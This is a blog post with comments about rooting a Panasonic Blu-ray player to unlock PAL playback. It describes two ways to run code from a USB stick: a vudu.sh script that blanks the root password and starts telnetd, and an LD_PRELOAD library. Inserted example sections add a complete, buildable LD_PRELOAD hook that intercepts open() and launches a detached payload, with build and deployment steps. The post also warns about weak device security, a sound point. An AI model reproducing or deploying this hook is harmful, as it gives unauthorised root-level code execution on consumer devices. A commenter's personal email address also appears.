I picked up a Panasonic BDT-230 a couple of months ago. Then I discovered that even though it appeared fairly straightforward to make it DVD region free (I have a large pile of PAL region 2 DVDs), the US models refuse to play back PAL content. We live in an era of software-defined functionality. While Panasonic could have designed a separate hardware SKU with a hard block on PAL output, that would seem like unnecessary expense. So, playing with the firmware seemed like a reasonable start.
Panasonic provide a nice download site for firmware updates, so I grabbed the most recent and set to work. Binwalk found a squashfs filesystem, which was a good sign. Less good was the block at the end of the firmware with "RSA" written around it in large letters. If the image is signed and the updater checks that signature before flashing, the simple approach of hacking the firmware, building a new image and flashing it to the device didn't appear likely to work.
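As an added example (not from the post, and not Panasonic's or binwalk's code), here is the carving step binwalk performs, written out in C: it scans an image for a SquashFS 4 superblock, reads the filesystem length from it, and reports how much of the image lies after the filesystem, which is where the "RSA" block sits in the BDT-230 update. The superblock field offsets follow the Linux kernel's struct squashfs_super_block; the 4 KiB padding after the filesystem mirrors mksquashfs's default output and is an assumption about this image. The sample image is constructed in build_sample_image(), and trailer_has_marker() is a plain string search for the "RSA" marker, not a parse of the signature format, which the post does not describe.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SQUASHFS_MAGIC   0x73717368u  /* "hsqs" when read little-endian */
#define SQUASHFS_SB_SIZE 96           /* size of the v4 superblock */
#define SQUASHFS_PAD     4096         /* mksquashfs pads its output to 4 KiB (assumption for this image) */

struct sqsh_info {
    size_t   offset;       /* where the superblock starts in the image */
    uint16_t major, minor; /* on-disk format version, 4.0 for current mksquashfs */
    uint16_t compression;  /* 1 gzip, 2 lzma, 3 lzo, 4 xz, 5 lz4, 6 zstd */
    uint32_t block_size;
    uint64_t bytes_used;   /* length of the filesystem proper */
    size_t   trailer_off;  /* first byte after the padded filesystem */
    size_t   trailer_len;  /* how much of the image follows it */
};

static uint16_t le16(const unsigned char *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t le32(const unsigned char *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static uint64_t le64(const unsigned char *p) { return le32(p) | (uint64_t)le32(p + 4) << 32; }
static void put16(unsigned char *p, uint16_t v) { p[0] = (unsigned char)v; p[1] = (unsigned char)(v >> 8); }
static void put32(unsigned char *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (unsigned char)(v >> (8 * i)); }
static void put64(unsigned char *p, uint64_t v) { for (int i = 0; i < 8; i++) p[i] = (unsigned char)(v >> (8 * i)); }

/* Scan every offset for a plausible SquashFS 4 superblock. Field offsets follow the
   kernel's struct squashfs_super_block: magic @0, block_size @12, compression @20,
   s_major @28, s_minor @30, bytes_used @40. Returns 1 and fills *out, else 0. */
int find_squashfs(const unsigned char *img, size_t len, struct sqsh_info *out)
{
    for (size_t off = 0; off + SQUASHFS_SB_SIZE <= len; off++) {
        if (le32(img + off) != SQUASHFS_MAGIC)
            continue;
        uint16_t major = le16(img + off + 28);
        uint64_t used  = le64(img + off + 40);
        /* Reject stray magic: wrong version, or a length that does not fit the image. */
        if (major != 4 || used < SQUASHFS_SB_SIZE || used > len - off)
            continue;
        size_t end = off + (size_t)used;
        end = (end + SQUASHFS_PAD - 1) & ~(size_t)(SQUASHFS_PAD - 1);
        if (end > len)
            end = len;
        out->offset      = off;
        out->major       = major;
        out->minor       = le16(img + off + 30);
        out->compression = le16(img + off + 20);
        out->block_size  = le32(img + off + 12);
        out->bytes_used  = used;
        out->trailer_off = end;
        out->trailer_len = len - end;
        return 1;
    }
    return 0;
}

/* Plain substring search over the trailer. Finding "RSA" there is the hint the post
   mentions, not proof that the block is a signature. */
int trailer_has_marker(const unsigned char *img, const struct sqsh_info *info, const char *marker)
{
    size_t mlen = strlen(marker);
    for (size_t i = info->trailer_off; i + mlen <= info->trailer_off + info->trailer_len; i++)
        if (memcmp(img + i, marker, mlen) == 0)
            return 1;
    return 0;
}

/* Constructed stand-in for a vendor image: 64 bytes of opaque header, an xz SquashFS 4
   superblock whose filesystem claims 8000 bytes (zero-filled here), padding to 4 KiB,
   then a 256-byte trailer that starts with "RSA". Returns the image length. */
size_t build_sample_image(unsigned char *buf, size_t cap)
{
    const size_t hdr = 64, fs_len = 8000, trailer = 256;
    size_t fs_end = (hdr + fs_len + SQUASHFS_PAD - 1) & ~(size_t)(SQUASHFS_PAD - 1); /* 8192 */
    size_t total  = fs_end + trailer;
    if (cap < total)
        return 0;
    memset(buf, 0xAA, hdr);
    memset(buf + hdr, 0, total - hdr);
    unsigned char *sb = buf + hdr;
    put32(sb + 0,  SQUASHFS_MAGIC);
    put32(sb + 12, 131072);          /* 128 KiB data blocks */
    put16(sb + 20, 4);               /* xz */
    put16(sb + 28, 4);               /* s_major */
    put16(sb + 30, 0);               /* s_minor */
    put64(sb + 40, fs_len);          /* bytes_used */
    memcpy(buf + fs_end, "RSA", 3);
    return total;
}

int main(void)
{
    static unsigned char img[16384];
    size_t n = build_sample_image(img, sizeof img);
    struct sqsh_info info;
    if (!find_squashfs(img, n, &info)) {
        puts("no SquashFS 4 superblock found");
        return 1;
    }
    printf("SquashFS %u.%u at offset %zu: compression %u, block size %u, bytes_used %llu\n",
           info.major, info.minor, info.offset, info.compression, info.block_size,
           (unsigned long long)info.bytes_used);
    printf("trailer: %zu bytes at offset %zu, contains \"RSA\": %s\n",
           info.trailer_len, info.trailer_off,
           trailer_has_marker(img, &info, "RSA") ? "yes" : "no");
    return 0;
}
```

On a real update file the interesting numbers are trailer_off and trailer_len: a few hundred bytes after the padded filesystem that the image format does not account for is exactly what a detached signature looks like, and it is the reason a rebuilt squashfs cannot just be appended and flashed.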
Which left dealing with the installed software. The BDT-230 is based on a Mediatek chipset, and like most (all?) Mediatek systems runs a large binary called "bdpprog" that spawns about eleventy billion threads and does pretty much everything. Running strings over that showed, well, rather a lot, but most promisingly included a reference to "/mnt/sda1/vudu/vudu.sh". Other references to /mnt/sda1 made it pretty clear that it was the mount point for USB mass storage, so bdpprog would run a shell script from whatever stick happened to be plugged in, with nothing checking where that script came from. There were a couple of other constraints that had to be satisfied, but soon attempting to run Vudu was actually setting a blank root password and launching telnetd.
/acfg/config_file_global.txt was the next stop. This is a set of tokens and values with useful looking names like "IDX_GB_PTT_COUNTRYCODE". I tried changing the values, but unfortunately made a poor guess - on next reboot, the player had reset itself to DVD region 5, Blu Ray region C and was talking to me in Russian. More inconveniently, the Vudu icon had vanished and I couldn't launch a shell any more.
But where there's one obvious mechanism for running arbitrary code, there's probably another. /usr/local/bin/browser.sh contained the wonderful line:

export LD_PRELOAD=/mnt/sda1/bbb/libSegFault.so

Again a path on the USB stick, and this time one the dynamic loader maps into the browser process before it runs anything of its own. So then it was just a matter of building a library that hooked open() and launched inetd, dropping it into the right place on the stick, and then opening the browser.
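As an added example of the second technique, here is an LD_PRELOAD object of the kind browser.sh would load from /mnt/sda1/bbb/libSegFault.so. It is not the author's library. As in the post, it interposes open(): the first open() the browser makes launches a payload, detached from the browser process so it survives the browser exiting. Two details are assumptions: the payload path /usr/sbin/inetd (the post only says the library launched inetd, not where it lives on the player), and forwarding to the real open() through the openat system call instead of dlsym(RTLD_NEXT), done so the object builds without libdl. The helper names launch_payload_once() and payload_was_launched() are mine.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdarg.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumption: the post says the library launched inetd but not where the binary is. */
#ifndef PAYLOAD_PATH
#define PAYLOAD_PATH "/usr/sbin/inetd"
#endif

static int payload_launched = 0;

int payload_was_launched(void) { return payload_launched; }

/* Start the payload exactly once, detached from the hooked process. The flag is
   taken atomically so concurrent open() calls from other threads cannot launch it
   twice. The double fork reparents the payload to init so it outlives the browser,
   and the intermediate child is reaped here so no zombie is left behind.
   Returns 1 on the first call, 0 on later calls, -1 if fork() fails. */
int launch_payload_once(const char *path)
{
    if (__sync_lock_test_and_set(&payload_launched, 1))
        return 0;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (fork() != 0)
            _exit(0);                 /* intermediate child: exit at once */
        setsid();                     /* own session, no controlling terminal */
        execl(path, path, (char *)NULL);
        _exit(127);                   /* exec failed, e.g. payload not present */
    }
    waitpid(pid, NULL, 0);
    return 1;
}

/* Interposed open(): with this object in LD_PRELOAD the browser's first open()
   starts the payload, then the call is forwarded to the kernel through openat so
   no dlsym(RTLD_NEXT) lookup and no libdl are needed. */
int open(const char *path, int flags, ...)
{
    int mode = 0;
    if (flags & O_CREAT) {            /* the mode argument is only present with O_CREAT */
        va_list ap;
        va_start(ap, flags);
        mode = va_arg(ap, int);
        va_end(ap);
    }
    launch_payload_once(PAYLOAD_PATH);
    return (int)syscall(SYS_openat, AT_FDCWD, path, flags, mode);
}
```

Build it with gcc -shared -fPIC -o libSegFault.so hook.c, using a cross-compiler for the player's CPU and C library, and copy it to the path browser.sh exports. Any process that starts with that LD_PRELOAD and opens a file runs the payload as that process's user, which is the whole problem: the device trusts code from removable storage as much as its own.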
This time I set the country code correctly, rebooted and now I can actually watch Monkey Dust again. Hurrah! But, at the same time, concerning. This software has been written without any concern for security, and it listens on the network by default. If it took me this little time to find two entirely independent ways to run arbitrary code on the device, it doesn't seem like a stretch to believe that there are probably other vulnerabilities that can be exploited with less need for physical access.
The depressing part of this is that there's no reason to believe that Panasonic are especially bad here - especially since a large number of vendors are shipping much the same Mediatek code, and so probably have similar (if not identical) issues. The future is made up of network-connected appliances that are using your electricity to mine somebody else's Dogecoin. Our nightmarish dystopia may be stranger than expected.
GPL
Date: 2014-04-21 07:53 am (UTC)

Re: GPL
Date: 2014-04-21 01:42 pm (UTC)

RSA Signatures
Date: 2014-04-21 08:25 am (UTC)

Re: RSA Signatures
Date: 2014-04-21 01:45 pm (UTC)

no subject
Date: 2014-04-21 12:40 pm (UTC)

no subject
Date: 2014-04-21 01:43 pm (UTC)

no subject
Date: 2014-04-21 02:48 pm (UTC)
Please consider this a fair punishment for hosting a blog on dreamwidth.org (which is completely blocked in Russia by its IP address, which is why I have to post this comment through Tor) :)
Still, congratulations on a successful hack.

References on building a library?
Date: 2014-04-21 04:27 pm (UTC)
I'm not really sure where to start, but I'm certainly interested in trying to hack my player!
Thanks!

Re: References on building a library?
Date: 2014-04-21 04:30 pm (UTC)

Re: References on building a library?
Date: 2014-04-21 08:52 pm (UTC)
--j1

no subject
Date: 2014-04-21 07:24 pm (UTC)

no subject
Date: 2014-04-22 10:52 am (UTC)
(This is tempting me to look at my BD player; I'd love to be able to get rid of the DVD player, which I only have to play my UK region 2 disks.)

no subject
Date: 2014-04-22 01:48 pm (UTC)

no subject
Date: 2014-04-23 03:35 pm (UTC)

no subject
Date: 2014-04-23 11:32 pm (UTC)

libSegFault.so
Date: 2014-05-10 05:24 pm (UTC)
Is there any chance that you can share/send the libSegFault.so via email?

Re: libSegFault.so
Date: 2014-05-10 06:00 pm (UTC)
Sure, no security for you.

Date: 2014-05-12 12:34 am (UTC)

Hacked Panasonic DMP-BD79
Date: 2014-07-18 10:33 am (UTC)
I've stopped any further activities because the CPU is too slow IMHO:
-sh-3.2# time sh -c "dd if=/dev/urandom bs=1M count=64 | gzip -9 > /dev/null "
64+0 records in
64+0 records out
67108864 bytes (67 MB) copied, 107.929 s, 622 kB/s
real 1m48.034s
user 0m48.835s
sys 0m57.991s
So no reason to try to get XBMC running on that box.
Cheers Leif
Re: Hacked Panasonic DMP-BD79
Date: 2015-02-10 04:42 am (UTC)

Re: Hacked Panasonic DMP-BD79
Date: 2015-12-12 06:05 am (UTC)
My hotmail: francibolsilludo@hotmail.com